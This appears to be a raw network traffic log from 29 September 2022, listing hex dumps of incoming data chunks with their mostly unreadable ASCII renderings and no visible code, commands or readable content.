                                                                                                                                                    2022-09-29 12:59:02 UTC6961INData Raw: 88 23 4b e6 4a 27 a2 4b ef 8f 36 2a 49 b0 da d9 15 25 81 6e 42 f6 2f cc 16 6b 43 87 1d b5 47 c1 48 5a 88 35 95 62 ad 87 cb ab d0 2f 58 7b 43 33 ca c6 18 11 7b 05 6d 15 30 5a 62 d4 fa 88 28 c7 d3 37 21 eb 2f 4d db 57 ed 3e b9 ca 94 94 7f 3f 5c e1 c5 be 8d 5f 8f 3e 33 60 36 f9 c5 8b 6b 5a 10 0a 8c 73 d2 ab 5e b9 ed 23 f3 a2 e6 d4 51 c5 80 88 30 6b 97 f5 ae b5 7d c8 63 cf e9 91 c4 b9 8a cd 6a a9 4c 36 30 1a 34 62 40 8d 1b 2b 83 49 fc e9 c9 d9 d0 bd 6c 64 20 20 5a ad 66 be a3 42 ea 10 e4 12 27 37 9f 98 f8 16 24 ff 08 a5 8c 30 f4 0c 49 56 15 22 8d 02 10 2a b1 bf 34 4f b9 13 26 ba d5 50 55 6f 43 8a 9a 1c 50 4f 4e bc 90 50 12 62 36 48 80 b9 84 c8 f0 a0 2b 54 1c e8 a2 b6 28 76 ae e8 c8 b9 34 44 e7 b5 36 b1 7d 7f fb 44 2d 9f 0e 30 af c6 0b 51 7e c9 f0 c7 57 d1 16
                                                                                                                                                    Data Ascii: #KJ'K6*I%nB/kCGHZ5b/X{C3{m0Zb(7!/MW>?\_>3`6kZs^#Q0k}cjL604b@+Ild ZfB'7$0IV"*4O&PUoCPONPb6H+T(v4D6}D-0Q~W
                                                                                                                                                    2022-09-29 12:59:02 UTC6977INData Raw: c0 fb ff a7 1f d7 24 a9 53 24 98 0a 18 b2 28 f2 02 a2 d1 0b 80 ed de 45 44 b8 81 89 2e 72 f8 7a 60 ab a9 e6 a8 25 50 8b b7 1f c8 88 c1 4b 04 ea 7f b9 42 60 d1 e6 4e 9a 62 ec 36 90 f3 9b 2b e2 3e 7d 91 77 ab a0 22 b7 74 95 69 46 a6 65 8f 7f e8 28 3f 62 a9 1e 35 7d b2 73 81 0a 0a 4b 58 f5 46 ee f2 2e dc d1 0f 7d c4 17 4a 70 e2 e4 44 49 05 df c5 09 a3 27 ec 6c a9 53 19 4f b9 dd 93 a0 14 e0 37 fa 14 8b 65 da 7b bc 14 2e e4 b9 53 00 48 c2 f5 be 5c 20 81 c3 40 9a 07 56 1a 69 2a 8a 17 98 ed 0c 13 b0 b9 7b 11 81 f6 22 db bb 63 87 9f 80 bc c6 a7 ac cf da 5c 77 c4 46 3f f6 d4 e0 15 81 c3 0e ba 42 f9 f3 79 1b a0 e7 09 8c 0e 20 f8 4b 07 a8 f8 7c c1 e0 e7 e5 90 61 8f e6 56 ba f8 7b 39 7e 3c 6b e6 1d b9 42 a3 16 74 6b bd 4d d1 31 36 2e 7b 4f 70 c0 f5 f5 db 85 6e 62 1b
                                                                                                                                                    Data Ascii: $S$(ED.rz`%PKB`Nb6+>}w"tiFe(?b5}sKXF.}JpDI'lSO7e{.SH\ @Vi*{"c\wF?By K|aV{9~<kBtkM16.{Opnb
                                                                                                                                                    2022-09-29 12:59:02 UTC6989INData Raw: 4f 8e d9 fa a5 af 3b a5 d9 ef e2 16 20 41 27 c8 e5 24 52 08 e2 45 b6 23 b4 3a 86 91 fa 60 aa e4 cc ec ea a2 e5 f8 f7 68 52 5e b6 31 8d b7 25 30 6b 85 f0 29 ae 8b e3 ff 34 ef 75 6b 3b cb d2 75 97 05 33 ae 13 4c 23 48 e0 3e 78 1f 49 66 d3 22 e9 dc 45 7e da 4f bb ce cd d2 7d c0 c4 76 db 75 9c 36 d8 e8 7e d4 73 ff 25 d6 83 28 01 c9 ee 75 06 32 6d 2a 6d ad 92 8e b6 7a 46 4c 32 39 3b 94 ce b9 ba d8 0e fd 30 c0 7d a5 de dd cd c6 d2 21 e1 08 95 ba bb 8a 49 49 21 00 a5 45 47 4c e9 bf 46 d7 78 3b cd ba 94 43 6e 46 10 5e 52 c4 a3 8b d3 c3 12 aa d9 e2 01 a7 c5 2f d3 71 b7 2f 3d 52 e5 e5 ac 0e 6b da de a5 b4 6e 39 88 fb c1 e0 2d 61 f8 a3 04 3b 9b 38 97 fe 7c cb c1 c9 0b c5 6c 48 79 40 38 97 0d 29 fa bb 7f c6 f5 f3 05 5e c8 82 4e 46 d8 fb 26 5a a1 aa 5b 6c 33 63 67 7c
                                                                                                                                                    Data Ascii: O; A'$RE#:`hR^1%0k)4uk;u3L#H>xIf"E~O}vu6~s%(u2m*mzFL29;0}!II!EGLFx;CnF^R/q/=Rkn9-a;8|lHy@8)^NF&Z[l3cg|
                                                                                                                                                    2022-09-29 12:59:02 UTC7005INData Raw: 56 70 09 45 bc b2 6c 37 47 a4 c5 ba 9e 7d 8f a1 7b fb 7b bd e0 fb 7f 23 54 22 97 82 54 4b c0 d0 8d f7 c9 97 45 15 ed 98 5a b8 34 08 99 2d d9 80 1c 6b e5 64 fa 97 70 dc bf 48 a6 dd b0 4d f2 64 f0 85 5b 9a 72 ef 34 74 ac 27 a0 c6 63 7a e3 9b cb 08 8e 44 fd 70 fa ce bb e9 bf d6 d7 1f f1 84 3f 82 f3 ce d5 83 80 4d ac 03 65 97 ed 67 40 d8 14 80 8b 60 c2 8e 20 55 f0 f5 fa 0d 96 b7 1e d2 51 1d e7 13 0e 73 7e 12 80 e4 bd 7d eb 48 cb 8a 98 dc a6 e9 24 64 fa dd 07 54 86 f2 fd dd 13 6f 87 90 82 23 eb eb db 75 72 9c 3b 06 e4 7b ab cd de 2c ea 57 99 4a 04 04 c4 b3 cf d0 77 b6 27 1b c6 01 ee e7 fc d5 46 1f f6 6c 8c 1b 0c e6 d7 6e 7b 5e fe 0f cc ae f4 d2 21 e8 15 89 ba b4 fd 1e f1 d9 34 db 40 7e 4a 8e 9f 95 da 1c b3 42 b8 96 b8 bb 33 aa fd 33 8c 3a d1 29 83 e6 51 3e c4
                                                                                                                                                    Data Ascii: VpEl7G}{{#T"TKEZ4-kdpHMd[r4t'czDp?Meg@` UQs~}H$dTo#ur;{,WJw'Fln{^!4@~JB33:)Q>
                                                                                                                                                    2022-09-29 12:59:02 UTC7021INData Raw: 9d d7 80 5c ae 1b 1b 69 83 6f 0d 04 5a 66 08 3a 1d 44 32 9b d0 ac 29 de 1f 2f 6f 4f 11 82 26 32 66 dc ad 94 07 80 12 fe 08 99 d3 f9 5b bb a8 4d 7b e7 24 0f 95 e6 65 39 39 0c 24 9a 64 f6 b7 2a 9a 1c ce 5f 07 9b f1 49 95 fe e2 6c bb 31 a8 f5 9f 86 22 a1 a4 e7 3a db e0 99 bf f7 d4 a1 95 e7 90 7d f7 a6 6e f2 63 fb 7f c0 2b 1b e5 a6 07 fe a9 7e 88 07 c9 13 d6 1d a7 13 16 4a aa 9b 7b 74 ba 05 a0 14 0b 8e b7 d7 d4 db 1a 6c ca 62 75 b9 c6 1e 62 44 58 28 9d 93 00 52 e6 28 a9 d2 ec 09 fc eb 88 c5 72 63 ff b6 3a d7 e0 b0 36 da 03 be 17 2f 35 cf ad ff 89 34 66 a3 7d d3 84 33 67 39 54 92 27 d7 30 57 d4 b9 99 64 1c f8 ba 86 af 3a 6e 8d 36 38 f9 79 97 25 76 62 79 41 60 1a 02 d7 a2 cc 3b dc df 18 3e f5 73 52 c5 e8 8d 36 84 bf 66 37 a9 6e bc d8 dd db 9e f2 9b da c1 5c c8
                                                                                                                                                    Data Ascii: \ioZf:D2)/oO&2f[M{$e99$d*_Il1":}nc+~J{tlbubDX(R(rc:6/54f}3g9T'0Wd:n68y%vbyA`;>sR6f7n\
                                                                                                                                                    2022-09-29 12:59:02 UTC7037INData Raw: 08 02 c5 74 d4 cc d7 46 36 d9 e6 dc cc 0e 22 ed 6e 48 73 d5 0a 41 1f ce 43 40 37 5b a5 44 be 03 ba 1a e5 57 5f 27 2c 61 32 50 d5 57 a4 64 07 b3 29 81 b1 d6 dd 43 0f 97 bd 96 24 4d 13 2c 4b de e4 2a e4 18 91 92 7a 05 e6 74 27 be 46 b8 9a 76 5e cc 1c eb e9 fb f6 14 c2 af 27 f6 91 d9 ba b9 ad 20 f2 0a ea da 38 1c 56 2d f0 62 8e 44 a9 60 70 a8 0e 65 bd 38 55 90 e7 4a 48 70 5c 12 0f a9 4a 91 f8 9d e0 53 c1 72 8c e3 ce 83 f7 70 60 7b af 6d cd 89 91 92 ae 50 b1 4f 63 99 84 e2 cd 30 d9 73 ca 38 a8 ad 87 a0 d7 93 9a ac 47 fe 1d 1b b2 9d a4 fb 3a d7 df d2 86 5a 9f 48 8c c5 fa 6b 1f 04 c8 a8 bf 53 a9 d6 d6 b2 6d 41 b7 a6 b8 05 88 c6 b1 88 d2 f0 86 c2 20 3d f8 9c c8 b5 86 d5 5b 62 71 db 12 b3 16 71 77 6a 23 38 8e fd 41 0e 54 f3 44 46 b7 a2 64 cd 28 2c 45 11 2e a5 47
                                                                                                                                                    Data Ascii: tF6"nHsAC@7[DW_',a2PWd)C$M,K*zt'Fv^' 8V-bD`pe8UJHp\JSrp`{mPOc0s8G:ZHkSmA =[bqqwj#8ATDFd(,E.G
                                                                                                                                                    2022-09-29 12:59:02 UTC7053INData Raw: f2 b7 56 a0 1a 07 5e 90 fd d9 a8 c4 ee 75 70 63 43 86 25 68 75 cd 79 2a f7 9a 71 d3 5b 7a 46 39 9c 65 99 a8 11 a6 b8 58 2a be 03 0b f8 03 67 a0 d7 bc d8 ce 85 25 7a 3c 9c 8a fd 86 9a d0 d0 d7 81 31 23 f1 91 14 a7 f6 c2 20 ba 59 18 c6 3e 3b 80 3e 08 df 05 48 6e fd 09 9a c3 5e 07 62 74 77 f1 79 9e 1a 36 01 9f 8e 0e bd 80 cf d7 91 a9 e9 21 13 4f bc 96 83 92 79 e2 63 23 1e 62 85 c1 be da ce 05 c8 c1 18 30 b8 10 a5 97 ea f3 34 dc be 10 94 98 aa 6a 68 64 45 75 b9 58 d8 cc 68 8b 96 7d 00 fd 4f 95 d4 46 cd 48 1e 39 fd 48 30 02 59 d3 62 77 fb 15 93 7a e2 16 d2 78 ac c8 c1 6b 27 e6 fb ef e4 b3 93 92 84 4c 76 f7 f8 f7 14 f2 01 f8 24 37 5c 73 25 57 3b e3 b0 62 e5 d8 10 26 fd cf 4c 4b f4 6a 6d 44 aa 5e 07 7d 47 a9 52 c4 8c 2e 9f 68 45 81 34 b5 72 fc 3b ab 24 e0 52 44
                                                                                                                                                    Data Ascii: V^upcC%huy*q[zF9eX*g%z<1# Y>;>Hn^btwy6!Oyc#b04jhdEuXh}OFH9H0Ybwzxk'Lv$7\s%W;b&LKjmD^}GR.hE4r;$RD
                                                                                                                                                    2022-09-29 12:59:02 UTC7069INData Raw: eb c2 e8 3b 47 fc 6b 43 92 c4 06 2a b0 2c 1a fb 5c 9f da 99 25 e4 db 3f 66 fd ce 41 48 1e a3 f4 96 94 ce 10 c3 0f 8d 47 ff c9 83 40 45 ac 93 2b eb df e9 cb d8 70 40 bd ad 25 4c 44 e7 c6 87 0a e8 c2 43 d9 e7 84 96 40 f2 11 a4 ca 21 30 4f aa 96 12 d0 a1 f3 83 2a 60 62 1d 84 9f ba 83 a8 de c7 2e 43 9c d6 49 56 60 fe 88 b1 38 40 fa 73 12 e5 7f e1 71 80 96 b7 cc f0 f8 0d c6 91 dc 26 16 e4 6b 0e b6 1a 45 ff f0 77 7f ca c2 67 bb 21 a9 02 fd 8a 20 74 94 3b c3 23 3f 27 98 d0 17 9a 1e 0c de 18 09 d7 1f 7d 04 59 ed 6d 54 cf e1 e4 58 e2 0f 47 a9 e8 9d e7 d4 1c b9 c8 62 62 54 92 79 b0 ca da 04 16 42 5f f8 69 8a 43 f8 f1 c9 dd 7c ba db 4b 6d df c8 9f 39 3e 23 27 e7 ba 5b 76 42 3b 59 c1 60 21 46 8e 58 2d 83 17 5e dd b9 75 77 4b 75 07 9b 49 71 89 f2 d5 f9 93 ac 2e 95 81
                                                                                                                                                    Data Ascii: ;GkC*,\%?fAHG@E+p@%LDC@!0O*`b.CIV`8@sq&kEwg! t;#?'}YmTXGbbTyB_iC|Km9>#'[vB;Y`!FX-^uwKuIq.
                                                                                                                                                    2022-09-29 12:59:02 UTC7085INData Raw: d1 fd bb dd 06 18 b1 46 c7 a5 30 b2 b0 ca a3 0b 15 4d b9 20 e8 e1 2a b3 bc 40 95 0c 7f 73 db ed fa 89 08 ff 6b 3c 8a d5 78 05 5d 8d 91 d9 83 e0 a8 d4 bf 9b bb 18 c8 6d 0d 99 18 5d b9 e7 45 11 49 19 26 f4 a3 cb 21 b2 04 50 c6 f2 c6 94 3a a6 cf 09 bc 36 e5 23 1b 7c 90 0f 2e c8 85 48 70 c7 10 ba 05 45 31 83 d8 01 60 bd 83 21 2c 55 51 8b 1c bf 8e 68 a4 ed 4e 61 8f 63 9c 14 79 10 f3 98 66 fb d1 d7 9b 10 5b fe 41 e2 68 a4 04 fb 24 90 a7 d1 4f 22 8d 7c 74 30 e0 79 31 87 56 5c 71 f0 17 f5 81 f4 d4 a6 aa 51 79 27 7a 02 4d e0 80 a8 b6 61 41 45 29 9a 8f 14 b1 fd 54 81 44 47 27 b6 a1 1b 55 89 cf 45 92 24 db ff 5c 2b 8a 5d b0 3c 1a f7 df 1b 9d 46 56 6b 74 8b af 21 35 be 3e 5d 30 77 2c 93 d6 da 0e 24 35 1c 20 63 e7 3d a7 6d fb 2e 15 f4 d3 db a4 c5 43 a1 61 87 73 b3 b5
                                                                                                                                                    Data Ascii: F0M *@sk<x]m]EI&!P:6#|.HpE1`!,UQhNacyf[Ah$O"|t0y1V\qQy'zMaAE)TDG'UE$\+]<FVkt!5>]0w,$5 c=m.Cas
                                                                                                                                                    2022-09-29 12:59:02 UTC7101INData Raw: 02 6a ea 4c 31 ec 84 3e 94 85 43 5e ef 9a 4c e1 e0 ae 5b 06 5e 4c 3e 49 a3 60 b5 c1 4f d7 86 8d 4e cf b4 ce 0d 6b 41 14 a8 5f e1 94 47 cf 2e dd de 6f 67 aa c7 ff 9d ff e5 bf 36 d1 6a 29 78 cf 18 6d 62 30 e4 e4 55 ea ae 18 7b 43 fe 01 19 dc 08 bf 07 4c 38 87 79 0b d2 43 b1 44 b1 ba 58 34 00 6b 89 af e2 88 2b 32 46 85 9f d2 28 75 2f 03 7b 24 23 11 e8 b3 6d a2 2e dd a1 bc b2 45 fb 6f 32 1e 98 20 ec ac fa a3 bb 63 f0 87 32 38 e1 fb 94 cb 3c 19 99 f6 1f 7b 30 b0 0c cd 60 cf 97 c4 5f e8 c6 99 2f 3c 8d bc 3b d7 99 fd fb 50 0f 43 4d f7 ec fe 95 66 29 ac 06 01 38 ec 12 71 a2 eb 8e 7f e6 1d cc 6e 2b 40 5b de 7c 0b dc ff d9 d3 54 97 eb e5 fa 6b 67 26 56 90 e9 8a 9a c0 ab dd c3 3d 1e ad cc 19 b6 00 23 86 45 97 76 bd 7f 12 89 a2 ce 51 93 6a ce 8c 4b 33 32 c9 cb dd 9f
                                                                                                                                                    Data Ascii: jL1>C^L[^L>I`ONkA_G.og6j)xmb0U{CL8yCDX4k+2F(u/{$#m.Eo2 c28<{0`_/<;PCMf)8qn+@[|Tkg&V=#EvQjK32
                                                                                                                                                    2022-09-29 12:59:02 UTC7117INData Raw: 3d ad 7b 60 54 6d 77 67 d1 f0 e4 21 5a c3 a9 71 2b cb fa 32 8e 01 74 b4 ea 47 fb 31 52 cb 0b 9d 80 88 31 23 db 1f 58 d9 c8 df 01 93 c2 9d c0 ed 3a 7d e6 67 90 7f 46 27 e9 12 a8 9e 4f af ed f8 d9 e0 ba c2 50 7d 51 ef 51 2d 14 53 f0 fe 95 cf 7b c5 dc 59 d2 94 1e cf 60 a1 a6 6f ec 89 b5 66 ba e5 79 3c ef 38 75 66 53 83 c2 42 fd a8 fd 44 a6 b9 8f 82 76 dc 23 91 88 fb 24 18 3b ed 88 8a ae ea bd d9 07 ff 9e 73 0e f5 1b 87 7b 04 e4 2e 71 b7 88 ac ff 80 5d c9 cb f2 97 68 0b ab 44 fd fa 1d 1c 8b 5d c4 df 6d ab f4 d0 a6 88 f7 f9 87 f7 4d 2f 85 0e 6c 05 46 28 3e b2 95 2c 85 21 db b7 13 0b 8f c8 32 8b ef 49 9f 5b c4 24 f5 6f f6 bb 13 c7 09 f1 68 1b 64 84 bc bf a8 48 3a 93 8d 41 6b 1a c8 f5 84 34 8b 55 0a 40 da 86 6e 72 31 33 ba e9 81 cd 09 04 6a 3a 6c c8 04 93 29 6e
                                                                                                                                                    Data Ascii: ={`Tmwg!Zq+2tG1R1#X:}gF'OP}QQ-S{Y`ofy<8ufSBDv#$;s{.q]hD]mM/lF(>,!2I[$ohdH:Ak4U@nr13j:l)n
                                                                                                                                                    2022-09-29 12:59:02 UTC7133INData Raw: 0f b4 0c 99 e8 3e a2 3a d0 5a c9 2a 87 dc 2e 45 4d 29 4b 95 7e 59 7c d9 bb c6 11 7d 2b 7c 5c 9a af 0e 8e cf 46 68 ba da 0e dd c7 c7 e2 86 9d f4 9f d6 2e 95 e6 1f 58 2a 8f 9b ce bf b3 64 c9 82 7b e1 3f 46 e7 77 33 75 e2 2b 72 ca 73 18 e1 62 01 4c 08 b9 5b 32 ab 2f c6 2c a3 b1 71 0d 96 ba 49 f8 2c c9 c9 7a 3e d1 f7 8c 93 9b e2 bd 19 ae cf 2b 20 64 36 0f 85 1d 2b 9c 31 bc f0 48 a2 b5 9e bf f0 60 2b 45 d7 c7 86 45 5f f5 74 d9 d0 f3 1f b6 0b f7 6f b8 6c cc 74 d3 da 8c 96 7b 19 73 17 ab 49 f8 3e ad a2 35 53 54 28 ac da 03 b9 22 7f b3 1b 1e f9 93 3a 3e 19 7a 3a 71 19 18 c7 ab 69 88 07 61 a9 75 ac 39 a2 fd 87 63 98 f5 af 8f 68 4f 17 82 5b 29 97 5c 61 98 76 23 56 fc 63 ea 14 bb 15 70 11 9e 76 ea 39 c9 37 0f 35 59 3d 31 66 50 d6 67 4d ff 57 5b b3 0d 5e 05 87 a5 ac
                                                                                                                                                    Data Ascii: >:Z*.EM)K~Y|}+|\Fh.X*d{?Fw3u+rsbL[2/,qI,z>+ d6+1H`+EE_tolt{sI>5ST(":>z:qiau9chO[)\av#Vcpv975Y=1fPgMW[^
                                                                                                                                                    2022-09-29 12:59:02 UTC7149INData Raw: 15 29 38 2a 43 1f bc 33 cf 13 b7 a1 a7 6f bb 1e 7a a4 19 e2 c3 41 df 66 4f e2 a4 5c b3 71 2e 9e 7b 5a e4 f6 cf 41 50 4c 75 d9 ba 06 20 6f 70 a5 ea 74 37 11 c4 4d 78 2d aa 72 60 54 bb 25 d2 94 57 ad 12 ba c9 da 7b fa 6f ae ca 85 33 23 92 85 be 51 e8 c8 af de 35 aa f6 bc 81 9b 13 92 fd 14 b1 88 e7 07 77 01 4a 94 d8 95 a3 1a 28 a5 1a 61 be 51 c4 cf d8 44 6a 03 56 65 d7 2f ec 73 42 ba 52 1f c5 82 aa 3d 04 66 82 26 b7 65 88 ac f7 c8 31 de 84 a7 99 f2 39 f7 a9 86 0a 56 64 17 ff 13 73 65 69 ae 07 44 29 a9 fd ec f9 59 d1 17 9f d3 be c7 e0 5d 37 86 01 09 bd d4 8a c6 e2 9f 01 68 20 15 77 c7 b2 90 fb 0d 79 c8 41 64 ba 54 c8 1d 5b dc b9 d1 c6 ab bd 5d 24 65 70 a8 17 f1 de b1 b1 6a 14 95 9a 65 27 2a 38 36 0d 24 77 3f 2d 60 89 84 82 e7 ab fe 72 4e 1d eb 63 6d f9 2c 26
                                                                                                                                                    Data Ascii: )8*C3ozAfO\q.{ZAPLu opt7Mx-r`T%W{o3#Q5wJ(aQDjVe/sBR=f&e19VdseiD)Y]7h wyAdT[]$epje'*86$w?-`rNcm,&
                                                                                                                                                    2022-09-29 12:59:02 UTC7165INData Raw: 06 fb 0b 88 cd 1e 6a 61 9e ee e5 0a a8 d5 e7 09 dd 62 ec 36 23 d8 58 43 47 c4 bf 36 0c 1d 21 9a c9 ae d6 ff 2d 94 aa e5 a5 e0 bd 04 1b d1 c9 ae 6a 6b c2 e9 6c 8b 05 66 4a 30 b9 98 74 63 05 12 1a c8 f0 e4 6d b7 a9 cc 76 7d 9f d5 1a 3f 5c d6 7c 49 89 36 6b 67 72 5f 4b fd 49 a8 8a 76 2d 8b 51 43 d3 e4 02 4d 0a e8 9a c5 3d 78 09 80 28 67 6c 2f 09 f7 87 c9 e7 ae fa 46 89 00 fe 94 34 4a a4 79 8a 04 32 b5 0b cc e1 ab 57 76 51 99 b4 d3 1f b2 80 79 ae 9e c8 dd 7a 6d 44 0c 40 ed 83 3c 53 bd 04 72 df b8 10 31 1e 73 71 4a bc 77 d9 5a 1f 1c 0c 28 ae 31 43 87 a0 90 e1 83 a4 e4 42 14 03 eb 17 0a 1c 49 f1 de a3 b0 ab 6e 94 84 0c a5 81 1f 8b 26 7f e6 d8 7a c5 b1 c0 35 64 d4 95 0b 9c c2 bd c0 ef 41 ab eb 39 00 41 eb ed b9 a3 d6 90 8f 96 34 2a 08 68 f1 f6 f3 92 ef c6 42 df
                                                                                                                                                    Data Ascii: jab6#XCG6!-jklfJ0tcmv}?\|I6kgr_KIv-QCM=x(gl/F4Jy2WvQyzmD@<Sr1sqJwZ(1CBIn&z5dA9A4*hB
                                                                                                                                                    2022-09-29 12:59:02 UTC7181INData Raw: 81 5f 8d 47 9e 60 7f a7 27 3c 59 03 19 e0 18 90 95 cf 35 bd f5 e7 93 62 da 1a 1e 6d 04 bc 32 60 9b de a4 50 6a 93 9b ee 6c e1 b2 f6 ca 9c a1 0e b7 f5 1f 73 3f 0c f9 93 f4 15 72 cc ff 24 4a e6 96 75 1d d9 ea 99 cb 42 c1 19 5c e9 21 1d f4 d2 6d f2 df 80 5b 2d 70 92 30 b5 a8 73 d5 6f de 10 06 fd 6f b4 53 92 5d 3f 99 2d 50 78 ce 2d f6 6a 2f ab b1 d6 5a 9c 7a f6 c2 28 7b bc 4b 42 53 0a 42 87 f2 ae 40 60 7b 1d 07 74 cf 97 81 28 d9 e4 0d ff 70 73 bd fe d7 e6 f2 03 ce 4e b6 57 24 52 3f e5 97 55 2d 6c c9 43 0e c6 f6 dd 32 80 50 8d a7 84 01 75 6e 42 58 1d 38 8f aa 1f 8c 1c c4 09 fb 0e e4 fe 71 15 fe 74 6a 73 4b 26 a1 2b 81 c1 60 db e0 aa d9 69 03 b5 b2 70 b9 ac 8a 16 38 7f e8 ff da 62 05 a3 80 e7 90 28 6c 97 4e b4 0d 44 c9 0c b9 7c 68 70 78 7f 61 58 6f e6 2a d2 d6
                                                                                                                                                    Data Ascii: _G`'<Y5bm2`Pjls?r$JuB\!m[-p0sooS]?-Px-j/Zz({KBSB@`{t(psNW$R?U-lC2PunBX8qtjsK&+`ip8b(lND|hpxaXo*
                                                                                                                                                    2022-09-29 12:59:02 UTC7197INData Raw: b4 4f 74 ed 23 d8 29 4c b7 e5 29 35 ad 73 3e 5a d0 18 ad 5a 3d 62 c8 38 72 77 d1 33 71 36 d9 2d 53 24 93 70 c0 82 6c 29 b8 e8 81 1b fc 00 f8 38 35 36 0f 42 76 bd 26 fe 85 fb b7 af f5 68 53 60 8a f6 4e 6a 32 31 f4 23 6e 53 ee 29 45 5d 8f d7 8b a0 e2 86 fe 94 ff 1e 54 9a 83 a2 77 20 18 55 2b 65 b8 b4 9e 04 42 e5 5c bd ae c8 8b c9 0f 6c 44 1a e2 e1 28 ef c1 de 4b a3 d2 69 6a a2 21 d0 bc 1b 60 d9 f5 d6 a6 43 ea 2b c2 a9 5b 77 49 97 df 03 6d 7e dd 55 ee ab c6 7a f4 0d b7 15 fc 93 61 b7 af 82 08 97 bb b9 cd be e7 10 8e 16 c0 a1 31 b1 08 53 55 9e 75 97 65 10 87 be 8a fb 36 ef ca 10 cf f0 7a e3 1a 54 51 6e f3 e2 5b 34 58 5a 73 28 d4 16 cc c4 c4 6b 04 ee 64 91 5b 00 ef 8d 95 b8 6b 93 cd 3d cf af a2 bb 15 10 c0 7e b0 62 f1 e0 31 04 f6 16 86 4e 99 39 6b 43 4b a0 7f
                                                                                                                                                    Data Ascii: Ot#)L)5s>ZZ=b8rw3q6-S$pl)856Bv&hS`Nj21#nS)E]Tw U+eB\lD(Kij!`C+[wIm~Uza1SUue6zTQn[4XZs(kd[k=~b1N9kCK
                                                                                                                                                    2022-09-29 12:59:02 UTC7213INData Raw: 94 ad c7 85 28 c6 72 a2 04 aa fc 21 b9 a0 15 d4 20 8d 26 35 01 37 03 a4 17 97 c9 82 51 c5 12 4f 84 0e 88 3a ca 66 5b 6d ab 03 ad 47 0c ab 35 97 0f a7 e2 b1 6d 3e 14 71 7e 8a 23 57 e7 44 44 45 7d 42 9d 90 ec 6c d7 65 34 f3 ea 82 de 00 ef e9 90 19 4d d7 d7 eb 1b d3 05 77 43 10 ee 0f 55 22 0a 34 65 2b 84 1c b5 d6 ea 92 96 76 85 8d b6 26 8e a2 14 4c 4c cd cb 4f 32 67 52 19 b5 db e2 d6 5a da 98 73 6a de a8 b7 61 60 d2 ca b7 a9 0a fc f2 a7 34 46 89 32 54 3b 3a 93 21 89 d1 8f 2e f2 0b fa b0 f1 bd 9c fa c9 a7 0d 41 2d 6c 8c db 31 41 ab d4 4f 79 ac fb 74 93 fc 52 b5 0a 44 91 24 14 e2 fb d7 6c 0a 2d 97 8b 03 fb 5e b4 cf 76 42 f6 cb 7b 67 ab fb 81 f0 b7 f4 43 19 23 d1 e2 58 1f 26 b9 e2 bb a0 43 72 2d 89 18 03 5c aa 20 d0 5e b2 64 87 d1 e8 a6 a9 9c c6 29 9c 3d a0 c8
                                                                                                                                                    Data Ascii: (r! &57QO:f[mG5m>q~#WDDE}Ble4MwCU"4e+v&LLO2gRZsja`4F2T;:!.A-l1AOytRD$l-^vB{gC#X&Cr-\ ^d)=
                                                                                                                                                    2022-09-29 12:59:02 UTC7229INData Raw: 01 dc 29 33 93 17 fc f1 f6 29 a8 e3 b3 b3 bd 80 bc 6d df 51 42 9a ce df e4 79 74 60 7a 9f f6 2f 3b f4 13 58 24 a1 a9 28 c1 51 6c 7f d6 d7 b5 62 3e 51 60 38 17 74 46 22 00 22 61 7c d0 c1 7c c1 58 94 d9 68 aa 0c ac 58 97 e7 4d ee 2c f3 a3 37 32 da 81 84 af 2f a4 60 7d ee 96 17 8c 2c c5 1b ed d5 c1 03 35 c9 08 fe f0 6f 58 c7 17 53 01 e4 79 99 83 d8 f4 c3 6a 79 8d 48 35 59 76 9d 77 7d 4c 41 2c be b2 df 0a 0f 34 e2 a7 6d e6 be bb 73 07 64 02 8c fd 33 49 d9 c2 de f8 bd a8 04 eb 09 25 a8 9f a0 76 84 1a 3f 3c 9b f5 f0 e7 68 db 8c a2 55 2d d1 62 21 5a a3 04 b6 79 25 1c 5f dc 60 53 c5 58 03 71 20 6c 41 65 79 73 11 c4 5f a3 47 bd 42 b9 ed cc d1 b1 5e 5d 12 c5 84 4b 48 f3 48 47 2f cf 66 78 3d b2 d3 f4 f5 00 a5 1d d0 e8 b4 61 c9 7a 44 99 df c6 39 78 23 7b b7 c5 a9 bc
                                                                                                                                                    Data Ascii: )3)mQByt`z/;X$(Qlb>Q`8tF""a||XhXM,72/`},5oXSyjyH5Yvw}LA,4msd3I%v?<hU-b!Zy%_`SXq lAeys_GB^]KHHG/fx=azD9x#{
                                                                                                                                                    2022-09-29 12:59:02 UTC7239INData Raw: 32 f6 90 4d 7c 8d a9 a6 38 49 8e cf dc 40 5f 08 f6 b4 51 0d c9 28 d8 34 81 89 28 34 9a 04 4c 76 fe 64 0b c3 16 fe 49 40 ec 84 5e 91 cf d8 3b ae 5f d1 60 ec 5d e8 9f 34 b8 70 e6 8e b3 19 a9 29 76 f0 7f 5a 19 3e 12 50 c9 a1 2e b8 38 2b 80 9c f3 4e 1d 73 42 ea de c7 43 1d 5c 73 26 17 6a c0 b6 80 a4 45 9f 01 97 10 5d 78 dc a1 a0 90 58 6e 41 69 06 7b 8b 2d 52 30 46 c5 2b d1 a6 ee 41 8a 55 94 a9 fd cc 5f ea bf e8 41 4b b0 a7 68 84 6d 2b 59 63 32 30 d9 98 cd 66 91 44 a5 6a be 66 87 5a 6d ac 1f 71 6e d2 f7 8a 2a e4 cd f8 34 75 c2 3d 6a 63 ae aa 55 35 a4 ba 26 31 b5 eb 10 de 08 d6 56 33 ce 13 78 e7 0f b5 fd 90 25 c3 c6 4c f0 5b 40 f4 c2 e4 c9 9c cf a4 ef f6 cb 57 60 ac ee 99 7e ee 25 72 7d 85 a0 a5 f9 6e 04 8d 2b 6a c8 15 6c e4 44 e7 90 8a 6c 21 50 b2 7b fe f9 fe
                                                                                                                                                    Data Ascii: 2M|8I@_Q(4(4LvdI@^;_`]4p)vZ>P.8+NsBC\s&jE]xXnAi{-R0F+AU_AKhm+Yc20fDjfZmqn*4u=jcU5&1V3x%L[@W`~%r}n+jlDl!P{
